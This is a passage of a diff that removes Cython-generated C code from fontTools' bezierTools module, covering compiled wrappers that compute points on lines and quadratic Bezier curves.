__Pyx_GOTREF(__pyx_t_5); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_1)) 
__PYX_ERR(0, 1025, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_2)) __PYX_ERR(0, 1025, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_t_3)) __PYX_ERR(0, 1025, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 3, __pyx_t_4)) __PYX_ERR(0, 1025, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_2 = 0; - __pyx_t_3 = 0; - __pyx_t_4 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1010 - * - * - * @cython.cfunc # <<<<<<<<<<<<<< - * @cython.inline - * @cython.locals( - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicPointsC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = 0; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1033 - * - * - * def linePointAtT(pt1, pt2, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a line. 
- * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_59linePointAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_58linePointAtT, "linePointAtT(pt1, pt2, t)\nFinds the point at time `t` on a line.\n\n Args:\n pt1, pt2: Coordinates of the line as 2D tuples.\n t: The time along the line.\n\n Returns:\n A 2D tuple with the coordinates of the point.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_59linePointAtT = {"linePointAtT", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_59linePointAtT, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_58linePointAtT}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_59linePointAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_t = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("linePointAtT (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_t,0}; - if (__pyx_kwds) { - 
Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1033, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1033, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("linePointAtT", 1, 3, 3, 1); __PYX_ERR(0, 1033, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_t)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1033, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("linePointAtT", 1, 3, 3, 2); __PYX_ERR(0, 1033, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "linePointAtT") < 0)) __PYX_ERR(0, 1033, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_pt1 = values[0]; - 
__pyx_v_pt2 = values[1]; - __pyx_v_t = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("linePointAtT", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 1033, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.linePointAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_58linePointAtT(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_t); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_58linePointAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_t) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("linePointAtT", 1); - - /* "fontTools/misc/bezierTools.py":1043 - * A 2D tuple with the coordinates of the point. 
- * """ - * return ((pt1[0] * (1 - t) + pt2[0] * t), (pt1[1] * (1 - t) + pt2[1] * t)) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_pt1, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_pt2, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_2, __pyx_v_t); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_3, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_pt1, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_pt2, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1043, 
__pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_3, __pyx_v_t); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Add(__pyx_t_4, __pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_t_2)) __PYX_ERR(0, 1043, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_3)) __PYX_ERR(0, 1043, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_t_3 = 0; - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1033 - * - * - * def linePointAtT(pt1, pt2, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a line. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_AddTraceback("fontTools.misc.bezierTools.linePointAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1046 - * - * - * def quadraticPointAtT(pt1, pt2, pt3, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a quadratic curve. 
- * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_61quadraticPointAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_60quadraticPointAtT, "quadraticPointAtT(pt1, pt2, pt3, t)\nFinds the point at time `t` on a quadratic curve.\n\n Args:\n pt1, pt2, pt3: Coordinates of the curve as 2D tuples.\n t: The time along the curve.\n\n Returns:\n A 2D tuple with the coordinates of the point.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_61quadraticPointAtT = {"quadraticPointAtT", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_61quadraticPointAtT, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_60quadraticPointAtT}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_61quadraticPointAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_t = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("quadraticPointAtT (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - 
PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_t,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1046, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1046, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("quadraticPointAtT", 1, 4, 4, 1); __PYX_ERR(0, 1046, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1046, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("quadraticPointAtT", 1, 4, 4, 2); __PYX_ERR(0, 1046, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_t)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1046, __pyx_L3_error) - else { - 
__Pyx_RaiseArgtupleInvalid("quadraticPointAtT", 1, 4, 4, 3); __PYX_ERR(0, 1046, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "quadraticPointAtT") < 0)) __PYX_ERR(0, 1046, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_t = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("quadraticPointAtT", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 1046, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.quadraticPointAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_60quadraticPointAtT(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_t); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_60quadraticPointAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_t) { - 
PyObject *__pyx_v_x = NULL; - PyObject *__pyx_v_y = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("quadraticPointAtT", 1); - - /* "fontTools/misc/bezierTools.py":1056 - * A 2D tuple with the coordinates of the point. - * """ - * x = (1 - t) * (1 - t) * pt1[0] + 2 * (1 - t) * t * pt2[0] + t * t * pt3[0] # <<<<<<<<<<<<<< - * y = (1 - t) * (1 - t) * pt1[1] + 2 * (1 - t) * t * pt2[1] + t * t * pt3[1] - * return (x, y) - */ - __pyx_t_1 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_pt1, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyInt_MultiplyCObj(__pyx_int_2, __pyx_t_2, 2, 0, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - 
__pyx_t_2 = PyNumber_Multiply(__pyx_t_3, __pyx_v_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_pt2, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Add(__pyx_t_1, __pyx_t_4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Multiply(__pyx_v_t, __pyx_v_t); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_pt3, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_4, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1056, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_x = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1057 - * """ - * x = (1 - t) * (1 - t) * pt1[0] + 2 * (1 - t) * t * pt2[0] + t * t * pt3[0] - * y = (1 - t) * (1 - t) * pt1[1] + 2 * (1 - t) * t * pt2[1] + t * t * pt3[1] # <<<<<<<<<<<<<< - * return (x, y) - * - */ - __pyx_t_1 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1057, 
__pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_pt1, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyInt_MultiplyCObj(__pyx_int_2, __pyx_t_2, 2, 0, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Multiply(__pyx_t_3, __pyx_v_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_pt2, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Add(__pyx_t_1, __pyx_t_4); if (unlikely(!__pyx_t_3)) 